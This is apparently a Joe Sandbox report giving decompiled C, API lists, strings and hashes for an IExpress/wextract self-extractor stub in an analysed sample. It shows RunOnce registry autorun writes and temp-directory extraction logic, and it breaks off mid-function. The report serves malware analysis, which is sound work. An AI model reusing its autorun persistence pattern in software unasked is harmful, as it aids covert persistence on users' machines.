Opcode Fuzzy Hash: bce71e99a48174c10c9f154ef3546d808f03261c0ec90ed626be6b45b19b2c6d
Instruction Fuzzy Hash: 6E11E5713043096BDB20ABF5AD89F6F3799AB84395B0B012DF906D7251DE31DC4387A1

Uniqueness

Uniqueness Score: -1.00%

Function 00AC6F40 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AC6F40() {

				SetUnhandledExceptionFilter(E00AC6EF0); // executed
				return 0;
			}

0x00ac6f45
0x00ac6f4d

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00AC6F45

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 114e3d2d8d3a32f0c96cc6b87cb7c49f4dcc936fd1e8ab893490cad9d19afa7d
Instruction ID: 264ec81e5749b06f2d0f5c4e55a9546131cdf81a581c848d4ed611e8d23cb105
Opcode Fuzzy Hash: 114e3d2d8d3a32f0c96cc6b87cb7c49f4dcc936fd1e8ab893490cad9d19afa7d
Instruction Fuzzy Hash: 639002742511049797109BB09D19D2575916A5D606B875965A011C4494DB6040415513

Uniqueness

Uniqueness Score: -1.00%

Function 00AC202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00AC202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0xac8004; // 0xc32e3ded
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00AC6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E00AC171E("wextract_cleanup2", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup2", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E00AC658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0xac9a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0xac91e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0xac91e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xac91e5);
						if(_t90 != 0) {
							 *0xac8580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\");
							E00AC171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup2", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E00AC44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E00AC658A( &_v268, 0x104, 0xac1140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0xac8530 = _t66;
				goto L23;
			}

0x00ac202a
0x00ac2035
0x00ac203c
0x00ac2041
0x00ac2050
0x00ac205f
0x00ac2064
0x00ac206f
0x00ac208c
0x00ac2094
0x00ac2257
0x00ac2266
0x00ac2266
0x00ac209a
0x00ac209b
0x00ac209d
0x00ac20aa
0x00ac20af
0x00ac20c9
0x00ac20d1
0x00000000
0x00000000
0x00ac20d3
0x00ac20da
0x00000000
0x00000000
0x00000000
0x00ac20da
0x00ac20e2
0x00ac2103
0x00ac210e
0x00ac2116
0x00ac2122
0x00ac2128
0x00ac212c
0x00ac2179
0x00ac2194
0x00ac21de
0x00ac21e4
0x00ac2256
0x00ac2256
0x00000000
0x00ac2256
0x00ac2196
0x00ac2196
0x00ac219c
0x00ac219f
0x00ac219f
0x00ac21a1
0x00ac21a2
0x00ac21a6
0x00ac21a8
0x00ac21b0
0x00ac21b0
0x00ac21b2
0x00ac21b3
0x00ac21bc
0x00ac21c7
0x00ac21cb
0x00ac21f1
0x00ac21f6
0x00ac21fd
0x00ac21ff
0x00ac21ff
0x00ac2204
0x00ac2213
0x00ac2218
0x00ac221d
0x00ac221d
0x00ac2220
0x00ac2220
0x00ac2222
0x00ac2223
0x00ac2229
0x00ac223d
0x00ac2249
0x00ac2250
0x00000000
0x00ac2250
0x00ac21d2
0x00ac21d9
0x00000000
0x00ac21d9
0x00ac213a
0x00ac2141
0x00ac2144
0x00ac214c
0x00000000
0x00000000
0x00ac2163
0x00ac2172
0x00ac2172
0x00000000
0x00ac2163
0x00ac20ea
0x00ac20f0
0x00000000

APIs

memset.MSVCRT ref: 00AC2050
memset.MSVCRT ref: 00AC205F
RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00AC208C

Part of subcall function 00AC171E: _vsnprintf.MSVCRT ref: 00AC1750

RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AC20C9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AC20EA
GetSystemDirectoryA.KERNEL32 ref: 00AC2103
LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AC2122
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00AC2134
FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AC2144
GetSystemDirectoryA.KERNEL32 ref: 00AC215B
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AC218C
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AC21C1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AC21E4
RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00AC223D
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AC2249
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AC2250

Strings

DelNodeRunDLL32, xrefs: 00AC212E
%s /D:%s, xrefs: 00AC21FF, 00AC2210
wextract_cleanup%d, xrefs: 00AC209E
wextract_cleanup2, xrefs: 00AC20A5, 00AC20BE, 00AC20F0, 00AC2232
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00AC21F6
advpack.dll, xrefs: 00AC2109
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00AC21A8, 00AC2204
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00AC2082

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
API String ID: 178549006-455997452
Opcode ID: a813d7beb76a2a81680281a30fa5c07db1af308b5abfbe22ecaa650c5caf8eb7
Instruction ID: 406928a2f792a6d4ee97adfa3c9dc9e87fc9d0a44e6de8a12830b6bed3b51d07
Opcode Fuzzy Hash: a813d7beb76a2a81680281a30fa5c07db1af308b5abfbe22ecaa650c5caf8eb7
Instruction Fuzzy Hash: 34510571A40218ABDB20DBA4DC4DFFB777CFB54740F0602ACFA49E6151EA749E468B60

Uniqueness

Uniqueness Score: -1.00%

Function 00AC55A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00AC55A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0xac8004; // 0xc32e3ded
				_v8 = _t28 ^ _t110;
				_t2 = E00AC468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E00AC468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0xac9a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0xac8b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0xac8a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00AC6517(_t82, 0x7d2, 0, E00AC3210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0xac9a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0xac91e4;
									_t40 = GetTempPathA(0x104, 0xac91e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00AC1781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00AC6952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E00AC597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00AC2630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E00AC658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0xac91e4;
																					E00AC1781(0xac91e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00AC5467(0xac91e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00AC2630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E00AC597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00AC5467(0xac91e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0xac91e4;
											_t70 = E00AC2630(0, 0xac91e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0xac91e4;
												_t71 = E00AC5467(0xac91e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E00AC597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0xac8b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00AC5467(0xac8b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E00AC44B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E00AC44B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0xac9124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E00AC44B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0xac9124 = E00AC6285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00AC6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}

0x00ac55ab
0x00ac55b2
0x00ac55c9
0x00ac55d5
0x00ac55d9
0x00ac5600
0x00ac5605
0x00ac560a
0x00ac560c
0x00ac5638
0x00ac5641
0x00ac5643
0x00ac5645
0x00ac5645
0x00ac564c
0x00ac5652
0x00ac5657
0x00ac5659
0x00ac5696
0x00ac569c
0x00ac589f
0x00ac58a7
0x00ac58ac
0x00ac58b3
0x00ac58b5
0x00ac56a2
0x00ac56a2
0x00ac56a8
0x00000000
0x00ac56ae
0x00ac56ae
0x00ac56b9
0x00ac56bf
0x00ac56c1
0x00ac56f3
0x00ac56f3
0x00ac5705
0x00ac570a
0x00ac5711
0x00ac5717
0x00ac5724
0x00ac5726
0x00ac5729
0x00ac5730
0x00ac5737
0x00ac573d
0x00ac5740
0x00000000
0x00000000
0x00000000
0x00000000
0x00ac572b
0x00ac572b
0x00ac572e
0x00ac5742
0x00ac5742
0x00ac5745
0x00ac576b
0x00ac576b
0x00000000
0x00ac5747
0x00ac5747
0x00ac574d
0x00ac574f
0x00ac5771
0x00ac5771
0x00ac5773
0x00000000
0x00ac5751
0x00ac5751
0x00ac5753
0x00000000
0x00ac5755
0x00ac575b
0x00ac5760
0x00ac5762
0x00000000
0x00ac5764
0x00ac5764
0x00ac5769
0x00ac577e
0x00ac577e
0x00ac5781
0x00ac5788
0x00ac578d
0x00ac578f
0x00ac57b2
0x00ac57b8
0x00ac57bd
0x00ac57bf
0x00ac57cd
0x00ac57cd
0x00ac57dd
0x00ac57e3
0x00ac57ef
0x00ac57f5
0x00ac57f8
0x00ac580a
0x00ac580a
0x00ac57fa
0x00ac5802
0x00ac5802
0x00ac580d
0x00ac580f
0x00ac5830
0x00ac5836
0x00ac583d
0x00ac584b
0x00ac5851
0x00ac5855
0x00ac585a
0x00ac585c
0x00000000
0x00ac585e
0x00ac585e
0x00000000
0x00ac585e
0x00ac5811
0x00ac5817
0x00ac5819
0x00ac581f
0x00000000
0x00ac581f
0x00ac5791
0x00ac5797
0x00ac579c
0x00ac579e
0x00000000
0x00ac57a0
0x00ac57a9
0x00ac57ae
0x00ac57b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00ac57b0
0x00ac579e
0x00000000
0x00000000
0x00000000
0x00ac5769
0x00ac5762
0x00ac5753
0x00ac574f
0x00000000
0x00000000
0x00000000
0x00ac572e
0x00000000
0x00ac5864
0x00ac5864
0x00ac5864
0x00ac5717
0x00000000
0x00ac56c3
0x00ac56c5
0x00ac56c9
0x00ac56ce
0x00ac56d0
0x00000000
0x00ac56d6
0x00ac56d6
0x00ac56d8
0x00ac56dd
0x00ac56df
0x00000000
0x00ac56e1
0x00ac56e2
0x00ac56e4
0x00ac56e6
0x00ac56eb
0x00ac56ed
0x00000000
0x00ac56f3
0x00ac56f3
0x00000000
0x00ac586c
0x00ac5878
0x00ac587e
0x00ac5882
0x00ac5883
0x00ac5889
0x00ac588e
0x00ac588e
0x00000000
0x00ac5896
0x00ac56ed
0x00ac56df
0x00ac56d0
0x00ac56c1
0x00ac56a8
0x00ac565b
0x00ac565b
0x00ac565d
0x00ac5669
0x00ac5669
0x00ac565f
0x00ac565f
0x00ac5665
0x00ac5667
0x00000000
0x00000000
0x00ac5667
0x00ac566c
0x00ac5673
0x00ac5678
0x00ac567a
0x00ac589b
0x00ac589b
0x00ac5680
0x00ac5685
0x00ac568c
0x00000000
0x00ac568c
0x00ac567a
0x00ac560e
0x00ac5613
0x00ac561a
0x00ac5620
0x00ac5626
0x00000000
0x00ac5626
0x00ac55db
0x00ac55e0
0x00ac55e7
0x00ac55f1
0x00ac55f6
0x00ac55f6
0x00ac55f6
0x00ac58b7
0x00ac58c7

APIs

Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46A0
Part of subcall function 00AC468F: SizeofResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46A9
Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46C3
Part of subcall function 00AC468F: LoadResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46CC
Part of subcall function 00AC468F: LockResource.KERNEL32(00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46D3
Part of subcall function 00AC468F: memcpy_s.MSVCRT ref: 00AC46E5
Part of subcall function 00AC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00AC55CF
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00AC5638
LocalFree.KERNEL32(00000000), ref: 00AC564C
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00AC5620

Part of subcall function 00AC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00AC4518
Part of subcall function 00AC44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00AC4554

Part of subcall function 00AC6285: GetLastError.KERNEL32(00AC5BBC), ref: 00AC6285

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00AC56B9
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00AC571E
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00AC5737
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00AC57CD
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00AC57EF
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00AC5802

Part of subcall function 00AC2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00AC2654

SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00AC5830

Part of subcall function 00AC6517: FindResourceA.KERNEL32(00AC0000,000007D6,00000005), ref: 00AC652A
Part of subcall function 00AC6517: LoadResource.KERNEL32(00AC0000,00000000,?,?,00AC2EE8,00000000,00AC19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00AC6538
Part of subcall function 00AC6517: DialogBoxIndirectParamA.USER32(00AC0000,00000000,00000547,00AC19E0,00000000), ref: 00AC6557
Part of subcall function 00AC6517: FreeResource.KERNEL32(00000000,?,?,00AC2EE8,00000000,00AC19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00AC6560

GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00AC5878

Part of subcall function 00AC597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00AC59A8
Part of subcall function 00AC597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00AC59AF

Strings

A:\, xrefs: 00AC56F4
msdownld.tmp, xrefs: 00AC57D3
RUNPROGRAM, xrefs: 00AC55BD, 00AC5600
Z, xrefs: 00AC570A
<None>, xrefs: 00AC5632
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00AC56AE, 00AC56B3, 00AC583D

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 2436801531-429805196
Opcode ID: 8a5682e1224989b99bf33ad9f75c833300a4549844fb89488b4ab98f460d2312
Instruction ID: c87f6e5e8204de8e06eb1b06ffdfae67e881a89d215bad227ace3a521b2289aa
Opcode Fuzzy Hash: 8a5682e1224989b99bf33ad9f75c833300a4549844fb89488b4ab98f460d2312
Instruction Fuzzy Hash: D6811670E04A089ADB249BB48D45FFE72ADAF61344F07056DF586D2191DF74ADC28B10

Uniqueness

Uniqueness Score: -1.00%

Function 00AC597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00AC597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0xac8004; // 0xc32e3ded
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0xac9124 = E00AC6285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E00AC44B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0xac9a34 & 0x00000008;
							if(( *0xac9a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0xac9a38; // 0x0
								_t110 =  *((intOrPtr*)(0xac89e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
